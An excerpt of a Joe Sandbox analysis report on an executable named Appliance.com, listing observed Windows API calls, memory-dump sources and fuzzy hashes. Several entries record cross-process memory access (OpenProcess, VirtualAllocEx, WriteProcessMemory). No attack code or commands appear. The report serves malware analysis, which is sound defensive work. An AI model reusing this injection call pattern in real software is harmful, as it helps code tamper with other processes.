                                                                                                                                              • Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60
                                                                                                                                            • _free.LIBCMT ref: 00DF2640
                                                                                                                                            • _free.LIBCMT ref: 00DF2653
                                                                                                                                            • _free.LIBCMT ref: 00DF2664
                                                                                                                                            • _free.LIBCMT ref: 00DF2675
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0d8e5f6e5d50d4a0802d5fb032878b70504f14c6bbe542c2b212c50524e3510d
                                                                                                                                            • Instruction ID: 2497e3ffa6ed724efc3e45c06bb79882782680d88de4ee0bee6b50b8a6cad236
                                                                                                                                            • Opcode Fuzzy Hash: 0d8e5f6e5d50d4a0802d5fb032878b70504f14c6bbe542c2b212c50524e3510d
                                                                                                                                            • Instruction Fuzzy Hash: 7DF030715065199F8A02AF56EC018B83764FF24750306454BF618F63B4C7310E85AFE4
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$_free
                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                            • Opcode ID: 86e9c7c9eeab7f4b6ce314e866728afc28a20676eb492cf3e50e2d6209a34ce1
                                                                                                                                            • Instruction ID: 503860745ed5803dcb1cec87d8255b51fabbacf6233112e0d1bd31983a912e10
                                                                                                                                            • Opcode Fuzzy Hash: 86e9c7c9eeab7f4b6ce314e866728afc28a20676eb492cf3e50e2d6209a34ce1
                                                                                                                                            • Instruction Fuzzy Hash: C6D1CF7990020EDACB289F68C8557BAB7B1FF55300F2E815AEB46DB250D3759D80CBB0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E341FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34229
                                                                                                                                              • Part of subcall function 00E341FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34239
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00E45419
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E4550E
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E455CD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                            • String ID: bn
                                                                                                                                            • API String ID: 2854431205-2317007323
                                                                                                                                            • Opcode ID: 02a41d9d5f7ef35263f066c08d3f769023a965c2f846b158dcc8cde7428707a6
                                                                                                                                            • Instruction ID: 78e59f02f5233834d3780bbfb8b09a3eac3859e0b9b77b8f4e23249c29c6cc2a
                                                                                                                                            • Opcode Fuzzy Hash: 02a41d9d5f7ef35263f066c08d3f769023a965c2f846b158dcc8cde7428707a6
                                                                                                                                            • Instruction Fuzzy Hash: 2BD15AB1900249DFCB14EF95D891EEDBBB4FF08314F54405EE416AB292DB71AA86CF60
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DCD253
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                            • String ID: t5$t5$t5
                                                                                                                                            • API String ID: 1385522511-3228143211
                                                                                                                                            • Opcode ID: 3d7b6d19126c217d81feb598197317dd262aebeb72131b73113b9c6fb09e9eba
                                                                                                                                            • Instruction ID: 323e64b0d1fd9777205b383f3f7d797d9f64ccaee6146b59862905a8c64fc1a0
                                                                                                                                            • Opcode Fuzzy Hash: 3d7b6d19126c217d81feb598197317dd262aebeb72131b73113b9c6fb09e9eba
                                                                                                                                            • Instruction Fuzzy Hash: 23911A75A002069FCB14CF5DC890AAAB7F2FF58314F29816ED995A7340D731E982DBA0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                            • String ID: CALLARGARRAY$bn
                                                                                                                                            • API String ID: 157775604-1875210186
                                                                                                                                            • Opcode ID: b11009821c8bc002613a3aed0e4ede96dc48725e4baad260bd4321e97d0d56f5
                                                                                                                                            • Instruction ID: 277d52533a15ae01a4b0f1a4a859e865adf87cadf07906496665eb5b15e7eb45
                                                                                                                                            • Opcode Fuzzy Hash: b11009821c8bc002613a3aed0e4ede96dc48725e4baad260bd4321e97d0d56f5
                                                                                                                                            • Instruction Fuzzy Hash: 5941B371E00215AFCB04EFA9D8819EEBBF5FF59325F105119E406B7261D7B09D81CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E2BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E22B1D,?,?,00000034,00000800,?,00000034), ref: 00E2BDF4
                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E230AD
                                                                                                                                              • Part of subcall function 00E2BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E22B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E2BDBF
                                                                                                                                              • Part of subcall function 00E2BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E2BD1C
                                                                                                                                              • Part of subcall function 00E2BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E22AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E2BD2C
                                                                                                                                              • Part of subcall function 00E2BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E22AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E2BD42
                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E2311A
                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E23167
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                            • Opcode ID: ff0f63333651cc25a231cd419fb80f32655d5880abbb65a7d7f0bd79894715ac
                                                                                                                                            • Instruction ID: 9128b8384ee8fd2045da728412ddb76e05579ce74600c4de003defffea12c218
                                                                                                                                            • Opcode Fuzzy Hash: ff0f63333651cc25a231cd419fb80f32655d5880abbb65a7d7f0bd79894715ac
                                                                                                                                            • Instruction Fuzzy Hash: 09413A72901228BEDB11DFA4DC82ADEBBB8EF49704F005095FA55B7181DA706F89CB61
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\19152\Appliance.com,00000104), ref: 00DF1AD9
                                                                                                                                            • _free.LIBCMT ref: 00DF1BA4
                                                                                                                                            • _free.LIBCMT ref: 00DF1BAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                            • API String ID: 2506810119-2029746458
                                                                                                                                            • Opcode ID: b8dfa1d0ee35745e8d187925b6ca9e0702a8b633807acca773bfc29c439aa47a
                                                                                                                                            • Instruction ID: 803b69c8b8cfb0da7093ea4f4fb89e402a349891db8ae884e28d31937407dd25
                                                                                                                                            • Opcode Fuzzy Hash: b8dfa1d0ee35745e8d187925b6ca9e0702a8b633807acca773bfc29c439aa47a
                                                                                                                                            • Instruction Fuzzy Hash: 35316675A0021CEFCB21DB55DC85DAEBBFCEB85710B1581ABEA0497221E6708E45D7B0
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E2CBB1
                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00E2CBF7
                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E929C0,01976D60), ref: 00E2CC40
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                            • Opcode ID: a2067758e33d6162d09000f728fb34e20ca808837e0972230943cf537c0f06e7
                                                                                                                                            • Instruction ID: 188bd442d1da0e20c15a79634677c1777baed357054d6e7360ddc3b99ff6e3f6
                                                                                                                                            • Opcode Fuzzy Hash: a2067758e33d6162d09000f728fb34e20ca808837e0972230943cf537c0f06e7
                                                                                                                                            • Instruction Fuzzy Hash: 074193712043129FD724DF24EC85B5EB7E8EF85718F244A2DF569A7291D730E904CB62
                                                                                                                                            APIs
                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E5DCD0,00000000,?,?,?,?), ref: 00E54F48
                                                                                                                                            • GetWindowLongW.USER32 ref: 00E54F65
                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E54F75
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long
                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                            • Opcode ID: 2a29abb0583e7862952207cfcec0a9edd6f242fc748a45a692038a92e16df417
                                                                                                                                            • Instruction ID: 46dddea3c7c6c9134e6d5cd9184eee98403866c47a4fd6e9f47f90ebf1b68406
                                                                                                                                            • Opcode Fuzzy Hash: 2a29abb0583e7862952207cfcec0a9edd6f242fc748a45a692038a92e16df417
                                                                                                                                            • Instruction Fuzzy Hash: A331C171204205AFDB218E38CC45BDA77A9EB08339F246B19F979B31D0CB70AC949B60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E43DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E43AD4,?,?), ref: 00E43DD5
                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E43AD7
                                                                                                                                            • _wcslen.LIBCMT ref: 00E43AF8
                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00E43B63
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                            • Opcode ID: 4f2ba7dab7d44a5ed673213baf71959f8181ff8a265f9052c607567b0d856489
                                                                                                                                            • Instruction ID: df877d03601b7833d463e17d694c2c8df3ecfb8725a30258776f62d6e6522e2d
                                                                                                                                            • Opcode Fuzzy Hash: 4f2ba7dab7d44a5ed673213baf71959f8181ff8a265f9052c607567b0d856489
                                                                                                                                            • Instruction Fuzzy Hash: 6B31B3356002019FCB20DF79D986FA977F1EF14328F249159E816AB792D731EE45C760
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E549DC
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E549F0
                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E54A14
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                            • Opcode ID: db873eff1248f0220d43fb167c45e3f78fda685dd142f037376af8930ffaa3b9
                                                                                                                                            • Instruction ID: 7bfe2706d6790b4b3f74a37b94a5d6ecd1f6e9a98897c29124bf9a52a912953e
                                                                                                                                            • Opcode Fuzzy Hash: db873eff1248f0220d43fb167c45e3f78fda685dd142f037376af8930ffaa3b9
                                                                                                                                            • Instruction Fuzzy Hash: 6A21E172600219BBDF158F50CC42FEB3B69EF48718F111614FE057B0D0D6B1E8959B90
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E551A3
                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E551B1
                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E551B8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                            • Opcode ID: 1a0a67955e6207da7f8596fd20d05e9fb94a8d95f8a380116ea2d85a782cf3d0
                                                                                                                                            • Instruction ID: f8df6cc5775c6f0f6528fcc391541c0a23792d46e245f472024ca09c2b58b1b6
                                                                                                                                            • Opcode Fuzzy Hash: 1a0a67955e6207da7f8596fd20d05e9fb94a8d95f8a380116ea2d85a782cf3d0
                                                                                                                                            • Instruction Fuzzy Hash: 962162B5601A49AFDB14DF24CC91EBB37ADEF59368B041459FA00A7361CB70EC19CBA0
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E542DC
                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E542EC
                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E54312
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                            • String ID: Listbox
                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                            • Opcode ID: 89dfc272e7d9f1266107a0d70a573d24d390e95065a5d51b23d325f6120161a0
                                                                                                                                            • Instruction ID: e9594611d7cbb4cc6e960caeba974080509ce434c43a0cc4fabb72fc1cfd51f9
                                                                                                                                            • Opcode Fuzzy Hash: 89dfc272e7d9f1266107a0d70a573d24d390e95065a5d51b23d325f6120161a0
                                                                                                                                            • Instruction Fuzzy Hash: 0921D372604218BBDF118F90CC84FAB376EEF89759F009515FE04AB1E0C6719C868BA0
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00E3544D
                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E354A1
                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00E5DCD0), ref: 00E35515
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                            • String ID: %lu
                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                            • Opcode ID: d892c42726679df5b29273fa70bd70dae6afbaa23b4f26f3a62a2ed4310010e2
                                                                                                                                            • Instruction ID: 51a7ddaae31825edd78bc9b5191c0faf488ed0f470c70db96b34d547fccc1f9b
                                                                                                                                            • Opcode Fuzzy Hash: d892c42726679df5b29273fa70bd70dae6afbaa23b4f26f3a62a2ed4310010e2
                                                                                                                                            • Instruction Fuzzy Hash: 73314F71A00209AFDB10DF54C985EAABBF8EF04309F144099E509EB362DB71EE45CB61
                                                                                                                                            APIs
                                                                                                                                            • GetActiveWindow.USER32 ref: 00E58339
                                                                                                                                            • EnumChildWindows.USER32(?,00E5802F,00000000), ref: 00E583B0
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
